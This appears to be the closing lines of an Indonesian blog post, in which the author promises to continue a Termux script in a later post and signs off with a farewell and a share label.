 Untuk script termuxnya saya akan lanjutkan di blog selanjutnya ya
 Dadah sampai jumpa lagi ...



Share: